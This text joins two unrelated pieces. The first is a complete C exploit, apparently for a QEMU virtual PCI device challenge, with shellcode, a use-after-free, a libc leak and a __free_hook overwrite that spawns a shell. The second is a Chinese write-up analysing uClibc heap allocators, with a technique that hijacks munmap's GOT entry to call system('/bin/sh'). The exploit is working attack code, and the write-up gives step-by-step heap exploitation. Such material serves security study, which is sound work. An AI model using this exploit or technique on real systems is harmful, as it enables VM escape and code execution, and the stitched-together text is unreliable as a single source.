#include <memory.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <stdio.h>


#define DEVICE_PATH "/sys/devices/pci0000:00/0000:00:04.0/resource0"
#define DEVICE_ADDR 0x00000000febf1000
#define    page_map_file     "/proc/self/pagemap"
#define    PFN_MASK          ((((uint64_t)1)<<55)-1)
#define    PFN_PRESENT_FLAG  (((uint64_t)1)<<63)


#define u64 unsigned long long
#define u32 unsigned int
#define u8 unsigned char

unsigned char* mmio_mem;
size_t pmio_base=0xc050;

void die(char*s)
{
  puts(s);
  exit(-1);
}

size_t mem_addr_vir2phy(u64 vir)
{
    int fd;
    int page_size=getpagesize();
    unsigned long vir_page_idx = vir/page_size;
    unsigned long pfn_item_offset = vir_page_idx*sizeof(uint64_t);
    uint64_t pfn_item;

    fd = open(page_map_file, O_RDONLY);
    if (fd<0)
    {
        printf("open %s failed", page_map_file);
        return -1;
    }

    if ((off_t)-1 == lseek(fd, pfn_item_offset, SEEK_SET))
    {
        printf("lseek %s failed", page_map_file);
        return -1;
    }

    if (sizeof(uint64_t) != read(fd, &pfn_item, sizeof(uint64_t)))
    {
        printf("read %s failed", page_map_file);
        return -1;
    }

    if (0==(pfn_item & PFN_PRESENT_FLAG))
    {
        printf("page is not present");
        return -1;
    }
    close(fd);
    return (pfn_item & PFN_MASK)*page_size + vir % page_size;
}

#include <stdint.h>
void mmio_write(size_t addr, size_t value)
{
  *((uint32_t *)(mmio_mem + addr)) = value;
}
size_t mmio_read(size_t addr)
{
    return *((uint32_t *)(mmio_mem + addr));
}
size_t pmio_write(size_t addr, size_t value)
{
    outl(value,addr);
}
size_t pmio_read(size_t addr)
{
    return (size_t)inl(addr);
}
void open_pmio()
{
    // Open and map I/O memory for the device
    if (iopl(3) !=0 )
        die("I/O permission is not enough");
}
void open_mmio()
{
    // Open and map I/O memory for the device
    int mmio_fd = open(DEVICE_PATH, O_RDWR | O_SYNC);
    if (mmio_fd == -1)
        die("mmio_fd open failed");
    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_mem == MAP_FAILED)
        die("mmap mmio_mem failed");
    printf("open mmio at %p\n",mmio_mem);
}

void* mmap_new()
{
    return mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
}

unsigned char shellcode[] = {0x48,0xb8,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x50,0x48,0xb8,0x2e,0x63,0x68,0x6f,0x2e,0x72,0x69,0x1,0x48,0x31,0x4,0x24,0x48,0x89,0xe7,0x48,0xb8,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x50,0x48,0xb8,0x68,0x6f,0x2e,0x63,0x60,0x72,0x69,0x1,0x48,0x31,0x4,0x24,0x48,0xb8,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x50,0x48,0xb8,0x72,0x69,0x1,0x2c,0x62,0x1,0x2e,0x63,0x48,0x31,0x4,0x24,0x31,0xf6,0x56,0x6a,0xe,0x5e,0x48,0x1,0xe6,0x56,0x6a,0x13,0x5e,0x48,0x1,0xe6,0x56,0x6a,0x18,0x5e,0x48,0x1,0xe6,0x56,0x48,0x89,0xe6,0x31,0xd2,0x6a,0x3b,0x58,0xf,0x5};
//{0x6a,0x68,0x48,0xb8,0x2f,0x62,0x69,0x6e,0x2f,0x2f,0x2f,0x73,0x50,0x48,0x89,0xe7,0x68,0x72,0x69,0x1,0x1,0x81,0x34,0x24,0x1,0x1,0x1,0x1,0x31,0xf6,0x56,0x6a,0x8,0x5e,0x48,0x1,0xe6,0x56,0x48,0x89,0xe6,0x31,0xd2,0x6a,0x3b,0x58,0xf,0x5};

void* maps[100] = {0};

void alloc_req(u64 num)
{
  mmio_write(0,(num-1) << 10);
  mmio_write(0x14,123);
}
void dele_req()
{
  mmio_write(0x18,233);
}
void read_device(u64 index,u64 des_addr,u64 res_addr)
{
  u64 real_addr = des_addr - (index << 10);
  mmio_write(0xc,index);
  mmio_write(0x4,real_addr);
  mmio_write(8,res_addr);
  mmio_read(0x10);
}
void write_device(u64 index,u64 src_addr,u64 res_addr)
{
    u64 real_addr = src_addr - (index << 10);
    mmio_write(0xc,index);
    mmio_write(0x4,real_addr);
    mmio_write(8,res_addr);
    mmio_write(0x10,233);
}
u8 test_buf[0x10000];
u64 write_bufs[0x100];

void print_hex(u64 *a,size_t len)
{
  for(int i=0;i<len;i++)
  {
    printf("%p ",a[i]);
    if(i%4 ==0)
    {
      puts("");
    }
  }
  puts("");
}
void read_anywhere(u64 addr,u64 req_addr)
{
  void* test = &test_buf;
  u64* test_ptr = test_buf;
  test_ptr[0] = 0x0000000000000400;
  test_ptr[1] = addr;
  test_ptr[2] = req_addr;
  write_device(1,mem_addr_vir2phy(test),mem_addr_vir2phy(test+0x100));
  read_device(0,mem_addr_vir2phy(test),mem_addr_vir2phy(test+0x100));
  return;
}
void write_anywhere(u64 addr,u64 req_addr)
{
  void* test = &test_buf;
  u64* test_ptr = test_buf;
  test_ptr[0] = 0x0000000000000400;
  test_ptr[1] = addr;
  test_ptr[2] = req_addr;
  write_device(1,mem_addr_vir2phy(test),mem_addr_vir2phy(test+0x100));
  write_device(0,mem_addr_vir2phy((void*)&write_bufs),mem_addr_vir2phy(test+0x100));
  return;
}

char cmd[] = "/bin/bash -c '/bin/bash'";

int main(int argc, char *argv[])
{
  setbuf(stdin,0);
  setbuf(stdout,0);
  setbuf(stderr,0);
  void* test = &test_buf;//mmap_new();
  printf("%p\n",test);
  //memset(test,0x90,0x1000);
  printf("%p\n",mem_addr_vir2phy(test));
  //scanf("%s",test);
  open_mmio();
  int a;
  u64* test_ptr = test_buf;
  alloc_req(5);
  dele_req(5);
  alloc_req(5);
  u64 leak_thread_arena = 0;
  u64 tcache_addr[10] = {0};
  for(int i=0;i<5;i++)
  {
    read_device(i,mem_addr_vir2phy(test),mem_addr_vir2phy(test + 0x100));
    u64* t = test;
    u64 res = *t;
    printf("%d:%p\n",i,res);
    if(!res)
    {
      continue;
    }
    if(res != 0)
    {
      leak_thread_arena = (res>>24) << 24;
    }
    tcache_addr[i] = res;
  }
  printf("leak arena %p\n",leak_thread_arena);
  printf("leak tcache:");
  for(int i=0;i<10;i++)
  {
    printf("%p ",tcache_addr[i]);
  }
  puts("");
  //scanf("%d",&a);
  //printf("finish");
  // start tigger uaf
  dele_req();
  for(int i=0;i<2;i++)
  {
    alloc_req(2);
    dele_req();
  }
  alloc_req(3);
  u64 req_addr = tcache_addr[3] - 0x410;
  printf("guess req addr %p\n",req_addr);
  test_ptr[0] = req_addr;
  test_ptr[1] = 0;
  write_device(2,mem_addr_vir2phy(test),DEVICE_ADDR + 0x18);
  scanf("%d",&a);
  alloc_req(2);
  read_anywhere(leak_thread_arena+0x20 + 0x870,req_addr);
  //print_hex(test_ptr,30);
  u64 leak_next_arena = test_ptr[0];
  printf("leak next %p",leak_next_arena);
  read_anywhere(leak_next_arena + 0x870,req_addr);
  u64 leak_libc = test_ptr[0];
  u64 libc_base = leak_libc - 2014080;
  printf("leak libc base %p",libc_base);
  u64 system_addr = libc_base + 349200;
  u64 free_hook = libc_base + 2026280-0x200;
  memset(write_bufs,0,sizeof(write_bufs));
  write_bufs[64] = system_addr;
  memcpy(&write_bufs,cmd,sizeof(cmd));
  write_anywhere(free_hook,req_addr);
  dele_req();
  return 0;
}

0x00 Before

审计固件的时候碰到了一个mips64下uClibc堆管理利用的问题,恰巧网络上关于这个的分析不是很多,于是研究了一下。并不是很全面,做个索引,若有进一步了解时继续补全。

0x01 何为uClibc?

面向百度百科的废话

uClibc 是一个面向嵌入式Linux系统的小型的C标准库。最初uClibc是为了支持uClinux而开发,这是一个不需要内存管理单元的Linux版本,因此适合于微控制器系统。

uClibc比一般用于Linux发行版的C库GNU C Library (glibc)要小得多,glibc目标是要支持最大范围的硬件和内核平台的所有C标准,而uClibc专注于嵌入式Linux.很多功能可以根据空间需求进行取舍。

uClibc运行于标准的以及无MMU的Linux系统上,支持i386,x86 64,ARM (big/little endian), AVR32,Blackfin,h8300,m68k,MIPS (big/little endian), PowerPC,SuperH (big/little endian), SPARC,和v850等处理器。

人话

对于某些架构的嵌入式硬件,需要一个低开销的C标准库实现,于是uClibc就出现了。但是由于其实现方式与glibc差别较大,所以利用思路上需要一些转变。好在uClibc没有傻大笨glibc的各种检查,利用思路较为简单明确。

0x02 内存管理器

关于uClibc利用分析首当其冲的就是mallocfree等内存管理函数的实现。事实上通过观察其源码可以发现,uClibc中malloc有三种实现,包括malloc, malloc-simplemalloc-standard。其中 malloc-standard 是最近更新的。它就是把早期 glibcdlmalloc 移植到了 uClibc中。本文关于利用的分析重点在malloc

malloc-simple

在这个版本的内存管理逻辑中,内存的分配和释放几乎就一一对应了mmapmunmap...

malloc()

[libc/stdlib/malloc-simple/alloc.c]

#ifdef L_malloc
void *malloc(size_t size)
{
    void *result;

    if (unlikely(size == 0)) {
#if defined(__MALLOC_GLIBC_COMPAT__)
        size++;
#else
        /* Some programs will call malloc (0).  Lets be strict and return NULL */
        __set_errno(ENOMEM);
        return NULL;
#endif
    }

#ifdef __ARCH_USE_MMU__
# define MMAP_FLAGS MAP_PRIVATE | MAP_ANONYMOUS
#else
# define MMAP_FLAGS MAP_SHARED | MAP_ANONYMOUS | MAP_UNINITIALIZED
#endif

    result = mmap((void *) 0, size + sizeof(size_t), PROT_READ | PROT_WRITE,
                  MMAP_FLAGS, 0, 0);
    if (result == MAP_FAILED) {
        __set_errno(ENOMEM);
        return 0;
    }
    * (size_t *) result = size;
    return(result + sizeof(size_t));
}
#endif

可以发现size没有做过多检查和处理就进了mmap的参数,而返回的地址则由mmap决定,并不存在一个特定的heap

free()

[libc/stdlib/malloc-simple/alloc.c]

#ifdef L_free
void free(void *ptr)
{
    if (unlikely(ptr == NULL))
        return;
    if (unlikely(__libc_free_aligned != NULL)) {
        if (__libc_free_aligned(ptr))
            return;
    }
    ptr -= sizeof(size_t);
    munmap(ptr, * (size_t *) ptr + sizeof(size_t));
}
#endif

直接调用了munmap

malloc-standard

我分析的固件使用的是这个机制

location: libc/stdlib/malloc-standard/*

相对而言malloc-standard较为复杂,具体逻辑可以直接参考dlmalloc

malloc

这个版本我愿称之为“无敌大套娃”

malloc()

使用malloc函数时发生了如下调用链

void *malloc (size_t size) [libc/stdlib/malloc/malloc.c]

mem = malloc_from_heap (size, &__malloc_heap, &__malloc_heap_lock);

__malloc_from_heap (size_t size, struct heap_free_area **heap) [libc/stdlib/malloc/malloc.c]

尝试使用__heap_alloc获取堆区中管理的已释放的内存:

 /* First try to get memory that's already in our heap.  */
  mem = __heap_alloc (heap, &size);

__heap_alloc (struct heap_free_area **heap, size_t *size) [libc/stdlib/malloc/heap_alloc.c]

/* Allocate and return a block at least *SIZE bytes long from HEAP.
   *SIZE is adjusted to reflect the actual amount allocated (which may be
   greater than requested).  */
void *
__heap_alloc (struct heap_free_area **heap, size_t *size)
{
  struct heap_free_area *fa;
  size_t _size = *size;
  void *mem = 0;

  _size = HEAP_ADJUST_SIZE (_size);

  if (_size < sizeof (struct heap_free_area))
    /* Because we sometimes must use a freed block to hold a free-area node,
       we must make sure that every allocated block can hold one.  */
    _size = HEAP_ADJUST_SIZE (sizeof (struct heap_free_area));

  HEAP_DEBUG (*heap, "before __heap_alloc");

  /* Look for a free area that can contain _SIZE bytes.  */
  for (fa = *heap; fa; fa = fa->next)
    if (fa->size >= _size)
      {
    /* Found one!  */
    mem = HEAP_FREE_AREA_START (fa);
    *size = __heap_free_area_alloc (heap, fa, _size);
    break;
      }

  HEAP_DEBUG (*heap, "after __heap_alloc");

  return mem;
}

如果请求的size小于下面结构体的大小会被自动扩大(原因见注释):

/* A free-list area `header'.  These are actually stored at the _ends_ of
   free areas (to make allocating from the beginning of the area simpler),
   so one might call it a `footer'.  */
struct heap_free_area
{
    size_t size;
    struct heap_free_area *next, *prev;
};
注意这个结构体在被free的块的底部,这很重要

然后就是在一条链表(就是一开始传入的&__malloc_heap)上遍历查找第一个size大于等于请求size的节点进入一个内联函数__heap_free_area_alloc [libc/stdlib/malloc/heap.h]:

static __inline__ size_t
__heap_free_area_alloc (struct heap_free_area **heap,
            struct heap_free_area *fa, size_t size)
{
  size_t fa_size = fa->size;

  if (fa_size < size + HEAP_MIN_FREE_AREA_SIZE)
    /* There's not enough room left over in FA after allocating the block, so
       just use the whole thing, removing it from the list of free areas.  */
    {
      __heap_delete (heap, fa);
      /* Remember that we've alloced the whole area.  */
      size = fa_size;
    }
  else
    /* Reduce size of FA to account for this allocation.  */
    fa->size = fa_size - size;

  return size;
}

该函数判断分配掉目标大小的size之后,剩余体积是否足够HEAP_MIN_FREE_AREA_SIZE,不够的话就整个从链表中取出(使用的双链表unlink),否则只取出对应大小的部分内存(切割)。

如果你有疑问:为啥在切割是不涉及链表操作?

那么请往上看:struct heap_free_area这个区域在freed区域的底部,只需要修改其中的size,然后把需要的mem取出,就完成了一次切割,节省了很多链表操作,提高了效率。

...

回到__malloc_from_heap,假如没有足够大小的freed区域用于取出,则会用mmap或者sbrk的方式向操作系统取得一块新的内存,具体使用mmap还是sbrk取决于编译时使用的宏:

#ifdef MALLOC_USE_SBRK
//如果用sbrk
      __malloc_lock_sbrk ();

      /* Use sbrk we can, as it's faster than mmap, and guarantees
     contiguous allocation.  */
      block = sbrk (block_size);
      if (likely (block != (void *)-1))
    {
      /* Because sbrk can return results of arbitrary
         alignment, align the result to a MALLOC_ALIGNMENT boundary.  */
      long aligned_block = MALLOC_ROUND_UP ((long)block, MALLOC_ALIGNMENT);
      if (block != (void *)aligned_block)
        /* Have to adjust.  We should only have to actually do this
           the first time (after which we will have aligned the brk
           correctly).  */
        {
          /* Move the brk to reflect the alignment; our next allocation
         should start on exactly the right alignment.  */
          sbrk (aligned_block - (long)block);
          block = (void *)aligned_block;
        }
    }

      __malloc_unlock_sbrk ();

#else /* !MALLOC_USE_SBRK */

      /* Otherwise, use mmap.  */
#ifdef __ARCH_USE_MMU__
      block = mmap ((void *)0, block_size, PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
#else
      block = mmap ((void *)0, block_size, PROT_READ | PROT_WRITE,
            MAP_SHARED | MAP_ANONYMOUS | MAP_UNINITIALIZED, 0, 0);
#endif

注意mem在返回到用户前会经过下列宏处理,以设置malloc_header,并让mem指向用户区域:

/* Set up the malloc header, and return the user address of a malloc block. */
#define MALLOC_SETUP(base, size)  \
  (MALLOC_SET_SIZE (base, size), (void *)((char *)base + MALLOC_HEADER_SIZE))

free

有了malloc的逻辑,free的逻辑也差不多明晰了

void free (void *mem) [libc/stdlib/malloc/free.c]

static void __free_to_heap (void *mem, struct heap_free_area **heap) [libc/stdlib/malloc/free.c]

首先调用__heap_free把被free的内存放入链中:

  /* Put MEM back in the heap, and get the free-area it was placed in.  */
  fa = __heap_free (heap, mem, size);

struct heap_free_area *__heap_free (struct heap_free_area **heap, void *mem, size_t size) [libc/stdlib/malloc/hewp_free.c]

/* Return the block of memory at MEM, of size SIZE, to HEAP.  */
struct heap_free_area *
__heap_free (struct heap_free_area **heap, void *mem, size_t size)
{
  struct heap_free_area *fa, *prev_fa;
    /* 此时的mem经过MALLOC_BASE宏处理,指向MALLOC_HADER */
  void *end = (char *)mem + size;

  HEAP_DEBUG (*heap, "before __heap_free");

  /* Find the right position in the free-list entry to place the new block.
     This is the most speed critical loop in this malloc implementation:
     since we use a simple linked-list for the free-list, and we keep it in
     address-sorted order, it can become very expensive to insert something
     in the free-list when it becomes fragmented and long.  [A better
     implemention would use a balanced tree or something for the free-list,
     though that bloats the code-size and complexity quite a bit.]  */

  /* 空闲区域链表是按照地址从小到大排列的,这个循环是为了找到 mem 应该插入的位置 */
  for (prev_fa = 0, fa = *heap; fa; prev_fa = fa, fa = fa->next)
      /* 遍历判断fa的尾部是否大于被free的内存的头部 */
    if (unlikely (HEAP_FREE_AREA_END (fa) >= mem))
      break;

    /* 判断fa的头部是否小于等于被free内存的尾部(这里包含了部分overlap的情况?) */
  if (fa && HEAP_FREE_AREA_START (fa) <= end)
    /* The free-area FA is adjacent to the new block, merge them.  */
    {
      size_t fa_size = fa->size + size;
    /* 出现首尾相接 */
      if (HEAP_FREE_AREA_START (fa) == end)
    /* FA is just after the new block, grow down to encompass it. */
    {
      /* See if FA can now be merged with its predecessor. */
      /* 判断free的内存是否刚好卡在prev_fa和fa之间,是则将三个块合并,作为一个新节点 */
      if (prev_fa && mem == HEAP_FREE_AREA_END (prev_fa))
        /* Yup; merge PREV_FA's info into FA.  */
        {
          fa_size += prev_fa->size;
          __heap_link_free_area_after (heap, fa, prev_fa->prev);
        }
    }
      else
          /* 个人感觉这部分实现有些逻辑错误,正在招专业人员求证,有结果了细化一下 */
    /* FA is just before the new block, expand to encompass it. */
    {
      struct heap_free_area *next_fa = fa->next;

      /* See if FA can now be merged with its successor. */

      if (next_fa && end == HEAP_FREE_AREA_START (next_fa))
        /* Yup; merge FA's info into NEXT_FA.  */
        {
          fa_size += next_fa->size;
          __heap_link_free_area_after (heap, next_fa, prev_fa);
          fa = next_fa;
        }
      else
        /* FA can't be merged; move the descriptor for it to the tail-end
           of the memory block.  */
        {
          /* The new descriptor is at the end of the extended block,
         SIZE bytes later than the old descriptor.  */
          fa = (struct heap_free_area *)((char *)fa + size);
          /* Update links with the neighbors in the list.  */
          __heap_link_free_area (heap, fa, prev_fa, next_fa);
        }
    }
        /* 设置新节点的size */
      fa->size = fa_size;
    }
  else
    /* Make the new block into a separate free-list entry.  */
    /* 如果fa和 mem之间有空隙或者 mem> HEAP_FREE_AREA_END (fa),那么可以简单地把 mem 插入 prev_fa 和 fa之间 */
    fa = __heap_add_free_area (heap, mem, size, prev_fa, fa);

  HEAP_DEBUG (*heap, "after __heap_free");

  return fa;
}
看注释

这段代码主要处理被释放内存在入链时的合并和插入

0x03 利用思路

前置知识

uClibc中没有类似Glibc那样的__free_hook__malloc_hook的机制,但是部分函数间调用使用了类似got表的机制,这里可以看反汇编后的结果:

关于这块这么设计的原因我不太清楚...

既然如此,那么如果能通过任意地址写改libuClibc.so中某些函数的got的地址也许就可以借助system("/bin/sh\x00")来getshell。

不过要与程序本身的got表区分,如果程序已经导入了某些函数符号,直接修改掉so中这些函数符号的got是不能影响程序本身调用的目标的。(重要)

.got:00000000000A8510  # Segment type: Pure data
.got:00000000000A8510                 .data # .got
.got:00000000000A8510 off_A8510:      .dword ___libc_stack_end
.got:00000000000A8510                                          # DATA XREF: _setjmp+4↑o
.got:00000000000A8510                                          # setjmp+4↑o ...
.got:00000000000A8518                 .dword 0x8000000000000000
.got:00000000000A8520 off_A8520:      .dword qword_AA1B0       # DATA XREF: brk+24↑r
.got:00000000000A8528 off_A8528:      .dword sub_5C5C0         # DATA XREF: __sigsetjmp_aux+3C↑r
.got:00000000000A8530                 .dword sub_64730
.got:00000000000A8538                 .dword sub_647F8
.got:00000000000A8540 memcpy_ptr:     .dword memcpy
.got:00000000000A8548 off_A8548:      .dword loc_20000         # DATA XREF: vwarn+C↑r
.got:00000000000A8548                                          # vwarnx+C↑r
.got:00000000000A8550 exit_ptr:       .dword exit
.got:00000000000A8558 open_ptr:       .dword open              # DATA XREF: creat+C↑r
...

malloc-simple

很明显,释放内存的munmap是一个很好的攻击目标,它的第一个参数正好是一个字符串指针,并且可控程度很高,如果能劫持其got表就可以爽歪歪了。

malloc

大部分操作都是一个基本没啥保护的双链表的操作,而且负责管理链表的heap_free_area在每个内存块的末尾。意味着如果有UAF的和堆溢出情况下可以修改free_size,然后取出被修改的节点造成向低地址的overlap。

在取出内存的过程中存在分割操作,如果可以找到目标区域附近某些值作为free_size(最好特别大),然后修改链表的某个next指针到这。当申请内存合适的时候可以拿到目标区域的内存。注意这种利用方式不能触发__heap_delete,否则容易出错。

malloc-standard

由于这种分配器只有fastbinunsortedbin两种结构,并且检查很稀松,所以大部分ptmalloc的知识可以迁移过来。并且伪造fastbin并取出时不检查目标区域的size...这简直给了和tcache一样的大方便。

刨除这部分,重点讲下怎么getshell(因为没有各种hook)...

源码宏太多,这里直接看反编译:

void free(void *__ptr)

{
  longlong *plVar1;
  uint uVar2;
  ulonglong uVar3;
  ulonglong uVar4;
  longlong lVar5;
  ulonglong chunk_true_size;
  longlong total_size;
  longlong chunk_header_ptr;
  ulonglong chunk_size;
  longlong lVar6;
  undefined auStack64 [32];
  undefined1 *local_10;

  if (__ptr == (void *)0x0) {
    return;
  }
  local_10 = &_gp_1;
  _pthread_cleanup_push_defer(auStack64,pthread_mutex_unlock,&DAT_001a82e0);
  pthread_mutex_lock((pthread_mutex_t *)&DAT_001a82e0);
  chunk_size = *(ulonglong *)((longlong)__ptr + -8);
  chunk_true_size = chunk_size & 0xfffffffffffffffc;
  chunk_header_ptr = (longlong)__ptr + -0x10;
  if (DAT_001c2cd8 < chunk_true_size) {
    uVar4 = DAT_001c2cd8 | 1;
    if ((chunk_size & 2) != 0) {
      DAT_001c3370 = DAT_001c3370 + -1;
      total_size = chunk_true_size + *(longlong *)((longlong)__ptr + -0x10);
      _DAT_001c3388 = _DAT_001c3388 - total_size;
      /* 注意这里 */
      munmap((void *)(chunk_header_ptr - *(longlong *)((longlong)__ptr + -0x10)),(size_t)total_size)
      ;
      goto LAB_0015d85c;
......

当chunk-sized大于一个阈值(不同版本可能不同,我这里是0x50)并且is_mmap标志位为1时,会把chunk_header_ptr-prev_size的地址送入munmap中。

假设我们有办法覆盖munmap的got表为system,那么如果控制参数为"/bin/sh\x00"?

这是我的一种思路:

  1. 控制prev_size0xfffffffffffffff0 (-10)
  2. 控制size为0x63(大于阈值且is_mmap位和inuse位为1)
  3. 在用户区域开头写入"/bin/sh\x00"

这样当进入munmap时就相当于执行了system("/bin/sh\x00")

参考链接:

https://blog.csdn.net/heliangbin87/article/details/78962425

https://blog.csdn.net/weixin_30596165/article/details/96114098